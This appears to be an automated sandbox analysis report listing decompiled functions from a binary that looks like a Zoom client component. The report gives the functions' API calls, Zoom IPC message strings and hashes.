                • SetErrorMode.KERNEL32(00000002,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,-00000004), ref: 00C52594
                  • Part of subcall function 00C5C27D: ??0CEvent@Cmm@@QAE@XZ.RWSNDPQSKZ ref: 00C5C29D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000), ref: 00C525FA
                • GetCurrentThreadId.KERNEL32 ref: 00C52608
                • SetConsoleCtrlHandler.KERNEL32(Function_00002480,00000001,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C5261A
                • SetTimer.USER32(00000000,00000001,00000032,00C524B0), ref: 00C52629
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C5263B
                • TranslateMessage.USER32(?), ref: 00C5264D
                • DispatchMessageW.USER32(?), ref: 00C5265A
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C5266A
                • SetConsoleCtrlHandler.KERNEL32(Function_00002480,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000,\ZoomOutlookMAPI,?), ref: 00C52676
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$ConditionMask$File$Message$??0?$Name@String$ConsoleCtrlE__@@@ErrorHandlerInfoModulePath@VerifyVersion$CurrentDeallocateDirectoryDispatchEvent@H_prolog3H_prolog3_LastModeNameRangeState@ThreadTimerTranslateU?$char_traits@_Unlock@V?$allocator@_V?$basic_string@_W@2@W@2@@std@@@W@std@@
                • String ID: \ZoomOutlookMAPI
                • API String ID: 3407468254-2543390975
                • Opcode ID: fa38489843d9d0ba05ae430c94ad5fc4a559503088397b34fa368424acceebdb
                • Instruction ID: e8f77f43d589ab9cb043cc1baa849df6d853510c5068b71b4beb15c7102c4bb1
                • Opcode Fuzzy Hash: fa38489843d9d0ba05ae430c94ad5fc4a559503088397b34fa368424acceebdb
                • Instruction Fuzzy Hash: CB517978C00358EFCB10DBA4DC89ADDBBB8AF16305F508159F815E3251DB349A89DB2A
                Function 00C9421D Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 130COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94224
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74E6A), ref: 00C94238
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C9426A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C942A7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C942D9
                • EnterCriticalSection.KERNEL32(?), ref: 00C94393
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C943B0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.Zoom.app.conf.request.my.idp.token,00000044,00C74E6A), ref: 00C943C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: clientID$com.Zoom.app.conf.request.my.idp.token$idp_domain$refreshTokenUrl$reqID$url$userEmail$userID
                • API String ID: 1443623190-1785747134
                • Opcode ID: ab3dcd2334d9a50082929ed4bfd913ad3474f21ed189ca9546e404a5552a45bc
                • Instruction ID: 2bc6e5468925c8f626db0b1154bbaf4c80532033053771a1bae8cdea64a20545
                • Opcode Fuzzy Hash: ab3dcd2334d9a50082929ed4bfd913ad3474f21ed189ca9546e404a5552a45bc
                • Instruction Fuzzy Hash: E641C874A007049BCF28EBB4C849AAD77B1BF45315F044128EC12AB391DF74DA4BDBA5
                Function 00C926F3 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 130COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C926FA
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71FDA), ref: 00C9270E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C92740
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C9277D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C927AF
                • EnterCriticalSection.KERNEL32(?), ref: 00C92869
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C92886
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.zoom.app.cci.ccivideo.joinmeeting.response,00000044,00C71FDA), ref: 00C92899
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: ErrCode$ErrDetailCode$JsCallid$RecordScreen$SessionID$SessionName$Success$com.zoom.app.cci.ccivideo.joinmeeting.response
                • API String ID: 1443623190-3312910215
                • Opcode ID: ec69a997b6735310dd254c621fbb8ed3ca622fe502b6f768225d537b19368b7e
                • Instruction ID: 4fe31d16d5704822a4de2e21f80584bea1b48b448643a58c6d6a76ef61d8ae84
                • Opcode Fuzzy Hash: ec69a997b6735310dd254c621fbb8ed3ca622fe502b6f768225d537b19368b7e
                • Instruction Fuzzy Hash: 7741C135E00704ABCF14EBA4C9496ADB775AF48301F044128EC52AB3C1DF30DE4AEB69
                Function 00C8A82D Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 130COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A834
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6B43A), ref: 00C8A848
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A87A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A8B7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A8E9
                • EnterCriticalSection.KERNEL32(?), ref: 00C8A9A3
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8A9C0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A9D3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: auto_generated_additional_data$avatar_version$com.Zoom.app.conf.custom3DAvatar.uptoweb.save$component_data$index$is_auto_generated$thumbnail_path$type
                • API String ID: 1443623190-4223377224
                • Opcode ID: 1c94d1e51a02185a6b01de00a05ab894b2eb36a01378ec4e14a08f925c895782
                • Instruction ID: 7ae80463fdd961f1bb3d4f076bbe75e2d437b91a45b742c0ad3863cda3806e5f
                • Opcode Fuzzy Hash: 1c94d1e51a02185a6b01de00a05ab894b2eb36a01378ec4e14a08f925c895782
                • Instruction Fuzzy Hash: A941F534A00B049BDF14FFA4D9456ADB775AF45309F054029EC12AB385DF309F8ADB6A
                Function 00CB400F Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 128COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB4016
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(name,?,00000060,00CB3FD4,CmmPdu,00000000,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB404F
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(version,?,?,?,?,?,?,?,?,?,?,name,?,00000060,00CB3FD4,CmmPdu), ref: 00CB4067
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(000000FF,version,?,?,?,?,?,?,?,?,?,?,name,?,00000060,00CB3FD4), ref: 00CB4076
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(version,?,?,?,?,?,?,?,?,?,?,name,?,00000060,00CB3FD4,CmmPdu), ref: 00CB4088
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,00D334D8,version,?,?,?,?,?,?,?,?,?,?,name,?,00000060), ref: 00CB40B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,00D334D8,version,?,?,?,?,?,?,?,?,?,?,name,?), ref: 00CB40F0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,00D334D8,version,?,?,?,?,?,?,?,?,?,?,name), ref: 00CB4103
                  • Part of subcall function 00C60646: __EH_prolog3.LIBCMT ref: 00C6064D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4145
                • ?FirstChildElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z.RWSNDPQSKZ(Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4183
                • ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4198
                • ?NextSiblingElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z.RWSNDPQSKZ(Node,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB41A4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$Archive@String$??0?$Attribute@Element@Element@2@Element@tinyxml2@@Error@2@Node@tinyxml2@@PackageQueryTreeTree@$AppendAttribute@2@Attribute@tinyxml2@@ChildChild@D@2@@std@@@D@std@@FindFirstH_prolog3H_prolog3_NextNode@Node@23@Root@SiblingState@U?$char_traits@Unlock@V123@@V?$allocator@V?$basic_string@Value@
                • String ID: Node$name$version
                • API String ID: 439996805-3963992849
                • Opcode ID: f1a506149537373ee806b1a103dd944cf2c5016202050d53a42d51024cf33db4
                • Instruction ID: f583da7b94f64b913e05e23634e1bb5df13ec8764747aa5a5df7cbb6c19f9672
                • Opcode Fuzzy Hash: f1a506149537373ee806b1a103dd944cf2c5016202050d53a42d51024cf33db4
                • Instruction Fuzzy Hash: 8D41C575E043099FCF09EFA8C9955EDBBB4AF54304F140019E805BB382DF709A88DB66
                Function 00CB83E0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 49COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: base_request$emoji_action_result$fetch_emoji_count_info$fetch_emoji_info$fetch_history_comment$fetch_history_thread$fetch_jump_thread$request_optionkeys$sync_comment_count$sync_single_thread$sync_thread$sync_thread_comment_count$sync_thread_comment_countex$undefined_fetch
                • API String ID: 431132790-1587160317
                • Opcode ID: af12a12b3adc3523a9d1937dd5c1adf7c7261b3b95798d5eb64f8178e3b96397
                • Instruction ID: eb05852df1ca32e31e9b2b9845c984efeb93b5a2a7aae64eeeb9db099ad8acfb
                • Opcode Fuzzy Hash: af12a12b3adc3523a9d1937dd5c1adf7c7261b3b95798d5eb64f8178e3b96397
                • Instruction Fuzzy Hash: 5001816824870AEECF50BE356C136EB7E55672CB04F20811671D9621C2CEF1454CEF76
                Function 00C76150 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 36windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76157
                • ??0?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@QAE@PBDH00000000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.open.teamchat.req,000027A9,myAccountId,businessType,sessionId,messageId,threadId,messageSvrTime,threadSvrTime,left,top,width,height,00000004), ref: 00C761A2
                  • Part of subcall function 00C78B50: __EH_prolog3.LIBCMT ref: 00C78B57
                  • Part of subcall function 00C78B50: ??0?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@QAE@PBDH0000000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,00000004,00C761A7,com.Zoom.app.conf.pmc.open.teamchat.req,000027A9), ref: 00C78B85
                  • Part of subcall function 00C958D2: __EH_prolog3_GS.LIBCMT ref: 00C958D9
                  • Part of subcall function 00C958D2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C761F2), ref: 00C958ED
                  • Part of subcall function 00C958D2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,00000044,00C761F2), ref: 00C9591F
                  • Part of subcall function 00C958D2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,00000044,00C761F2), ref: 00C9595C
                  • Part of subcall function 00C958D2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,?,-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,00000044,00C761F2), ref: 00C9598E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@V12@_$H00000000000@H0000000000@H_prolog3_Node@23@Root@Template_10@Template_11@Tree
                • String ID: bDockOut$businessType$com.Zoom.app.conf.pmc.open.teamchat.req$height$left$messageId$messageSvrTime$myAccountId$sessionId$threadId$threadSvrTime$top$width
                • API String ID: 787339479-2942348831
                • Opcode ID: 928ac8601d7b9ea2ad6457c1a7d30f67ac69d16ccd54b39b10f279a055a698dd
                • Instruction ID: daddfb9631b4eed25b1eecded13051070a175eb245f42de425a80233a9ae1315
                • Opcode Fuzzy Hash: 928ac8601d7b9ea2ad6457c1a7d30f67ac69d16ccd54b39b10f279a055a698dd
                • Instruction Fuzzy Hash: AC01D1F1688F45AFC730BB948C17B897AA06710B19F004428B614262D1CBF0160CDB7D
                Function 00C968D7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C968DE
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77537,com.Zoom.app.conf.meeting.wallpaper.start_download), ref: 00C968F8
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C77537,com.Zoom.app.conf.meeting.wallpaper.start_download), ref: 00C96926
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000044), ref: 00C96963
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000044), ref: 00C96993
                • EnterCriticalSection.KERNEL32(?), ref: 00C96A39
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C96A56
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000044), ref: 00C96A69
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: file_scenes$file_type$sha256sum$title$url$wallpaper_id
                • API String ID: 1443623190-2034822180
                • Opcode ID: 222312a8b62ebea238a99939dd872b0d1771ed5da5954011c5b1d81279599b9a
                • Instruction ID: 9189248dcc6d9ccdf31748f8e598969b918f4a5f4ef92af96c589b98bb0fe3be
                • Opcode Fuzzy Hash: 222312a8b62ebea238a99939dd872b0d1771ed5da5954011c5b1d81279599b9a
                • Instruction Fuzzy Hash: E141E275A007189BCF14EFA4C8196ADBBB5AF44301F048118EC12BB391DF309F4AEB69
                Function 00C8C233 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8C23A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C3B0), ref: 00C8C24E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,00000044,00C6C3B0), ref: 00C8C280
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2BD
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2EF
                • EnterCriticalSection.KERNEL32(?), ref: 00C8C381
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8C39E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C3B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: check_audio_device$com.Zoom.app.pt.mediaapi.request$mode$req_type$requestID$timeout_seconds
                • API String ID: 1443623190-1181956020
